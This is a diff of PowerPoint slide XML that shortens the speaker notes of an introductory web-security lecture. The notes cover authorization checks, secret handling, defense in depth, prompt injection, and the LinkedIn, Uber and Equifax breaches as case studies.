-              <a:t>The fix restores a real authorization check: the user must be the owner OR appear in a shares table. Crucially, this makes revocation actually work - delete the share row and the contractor loses access immediately, regardless of whether they saved the uuid. The take-home: unguessable identifiers are a defense against enumeration (a nice complement to the /messages fix from bug #1), but they are never a substitute for an authorization check. If knowing a string is the only thing standing between an attacker and the data, you have a secret, not an access control system - and secrets in URLs do not stay secret.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Random ids still good against enumeration (bug #1), never a substitute for authorization.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -8591,20 +7656,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The synthesis slide. The three exercises all share the same shape: authentication works, authorization is missing. Once students see the pattern they'll start spotting it in their own code. The 'audit your final project' line is the concrete action item - grep for `WHERE id = :id` (or the SQLAlchemy ORM equivalent) and check each hit. The fix is almost always one additional clause in the WHERE. Cheap to add, catastrophic to forget.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Grep for `WHERE id = :id` or the ORM equivalent; check each hit.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -8749,20 +7803,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The synthesis slide. The three exercises all share the same shape: authentication works, authorization is missing. Once students see the pattern they'll start spotting it in their own code. The 'audit your final project' line is the concrete action item - grep for `WHERE id = :id` (or the SQLAlchemy ORM equivalent) and check each hit. The fix is almost always one additional clause in the WHERE. Cheap to add, catastrophic to forget.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Grep for `WHERE id = :id` or the ORM equivalent; check each hit.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -8907,20 +7950,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The two patterns exist, students should recognize them when they see them in docs, but they're really not going to implement either one themselves. Name them so the terminology isn't scary, then move on pretty quickly - the next slide is the one that actually matters.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Name them and move on quickly.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -9064,22 +8096,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The don't-roll-your-own rule is really one of the best pieces of advice in the whole lecture. Auth is tempting to implement yourself because it feels tractable when you squint at it, but it isn't - every single bullet on that list is a way to get pwned, and the list is unsettling because it's correct...no hand-waving here.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -9223,20 +8240,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Supabase is really the class's answer to 'how do we have auth without teaching auth.' It's a really good answer - students get production-quality auth for free and can focus on their actual project. Emphasize hard that this isn't cheating, it's the correct engineering choice, and anyone who rolls their own is making extra work for themselves for no real learning benefit.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Say it plainly: using Supabase auth is the correct engineering choice.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -9381,20 +8387,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LinkedIn is the canonical 'roll-your-own auth went wrong' story, and it lands well because every bullet on the previous slide maps directly to a real consequence here. The 117M-vs-6.5M revelation in 2016 is worth flagging - the company themselves didn't know the real blast radius for four years. Imagine telling 100M users in 2012 'you're fine' and then in 2016 going 'wait, actually...'</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
+            <a:r>
+              <a:t>LinkedIn didn't know the real blast radius for four years.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -9539,20 +8534,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>LinkedIn is the canonical 'roll-your-own auth went wrong' story, and it lands well because every bullet on the previous slide maps directly to a real consequence here. The 117M-vs-6.5M revelation in 2016 is worth flagging - the company themselves didn't know the real blast radius for four years. Imagine telling 100M users in 2012 'you're fine' and then in 2016 going 'wait, actually...'</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>LinkedIn didn't know the real blast radius for four years.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -9697,20 +8681,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Reinforcement of 7.2 with the specific failure modes named. All three rules are easy to violate, and committing a .env file in particular is an easy slip - it's a normal-looking file sitting right next to everything else you're staging, so it's worth flagging loudly before anyone does it. Tell them not to before they do, and tell them what to do if they already have (rotate the secret, don't try to scrub git history).</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>If already committed: rotate, don't try to scrub git history.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -9855,20 +8828,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The Uber story does double duty: it lands the "private is not secret" point, and it also lands the harder lesson that the cover-up usually costs more than the breach. Sullivan's conviction is recent enough that students may not have heard of it, and it's the first time a CISO actually went to court for a breach response. The grep-for-AKIA detail makes it concrete - attackers don't read 30,000 lines of code, they run a regex.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>First CISO convicted over a breach response. Cover-up cost more than the breach.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -10013,20 +8975,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Two messages on this slide: security is a property of your earlier choices rather than a final polishing step, and the lecture is mostly retrospective validation. The news hook is intentionally vague so I don't invent specifics that might be wrong - drop in whatever is actually current when you deliver, there will be something fresh basically every week.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Open with a current breach from the news.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -10170,22 +9121,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Defense in depth is really the mindset that replaces 'find the one perfect protection.' You layer multiple imperfect protections, and each one bounds the damage if the one in front of it fails...this is kinda how professional security teams actually think, and it's a useful posture even if you never end up on a security team yourself.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -10329,20 +9265,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Equifax is the cleanest illustration of why defense in depth matters: every single one of the secondary layers that should have caught this attack was either missing or asleep. 9000 queries from one IP over weeks is a trivial pattern to alert on if you have any database monitoring at all. They didn't. The cost is half the US adult population's SSNs in the wild forever, which is kind of unimaginable until you remember it actually happened.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>9,000 queries from one IP is trivial to alert on with any DB monitoring.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -10487,20 +9412,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Equifax is the cleanest illustration of why defense in depth matters: every single one of the secondary layers that should have caught this attack was either missing or asleep. 9000 queries from one IP over weeks is a trivial pattern to alert on if you have any database monitoring at all. They didn't. The cost is half the US adult population's SSNs in the wild forever, which is kind of unimaginable until you remember it actually happened.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>9,000 queries from one IP is trivial to alert on with any DB monitoring.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -10644,22 +9558,7 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>The 'cleverness budget is zero' framing is really the one I want to stick. The urge to build things yourself because they're exciting is great in general, but for security-critical code specifically the right move is to be boring and use what audited professionals have already built...this is a real cultural lesson and worth saying plainly, not just once.</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
+          <a:p/>
         </p:txBody>
       </p:sp>
       <p:sp>
@@ -10803,20 +9702,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>It's a new attack surface but it rhymes perfectly with the 27-year-old SQL injection lesson: don't let attacker-controlled strings become part of your program's control flow. For SQL the structural part was the query; for an agent the structural part is its instructions. Same shape. The 'in English, against an LLM' line is the one I want students to remember - it reframes a scary-feeling new attack as an old one in a new outfit. Hands off to 10.1 cleanly.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>For SQL the structure was the query; for an agent it's the instructions.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -10961,20 +9849,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>It's a new attack surface but it rhymes perfectly with the 27-year-old SQL injection lesson: don't let attacker-controlled strings become part of your program's control flow. For SQL the structural part was the query; for an agent the structural part is its instructions. Same shape. The 'in English, against an LLM' line is the one I want students to remember - it reframes a scary-feeling new attack as an old one in a new outfit. Hands off to 10.1 cleanly.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>For SQL the structure was the query; for an agent it's the instructions.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -11119,20 +9996,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Closing with a concrete action item - students should really go audit their code for those specific four things. Most of the time the audit will pass trivially because Supabase + FastAPI + React are all secure by default...the point is to verify, not to just trust the stack blindly. Push your coding agent through the checklist if you have to.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Audit will mostly pass since the stack is secure by default. Verify anyway.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -11431,20 +10297,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>Introduce the principle carefully and say it out loud more than once - the rest of the lecture really does come back to this exact phrase over and over. Students should leave able to evaluate a library by asking one question: 'is the obvious thing to do with this also the safe thing?' If yes, great. If no, push back on it.</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Say 'secure by default' out loud, it recurs all lecture.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -11589,20 +10444,9 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US"/>
-              <a:t>This is the retrospective part and the emotional tone matters a lot - every callback is a moment from an earlier lecture where they didn't know they were doing the security-relevant thing. Today they learn those choices were the whole point. The register is 'you were always on the right path', not 'here's a bunch of scary new stuff you don't know.'</a:t>
-            </a:r>
-            <a:endParaRPr/>
+            <a:r>
+              <a:t>Tone: you were already on the right path, no scary new stuff.</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
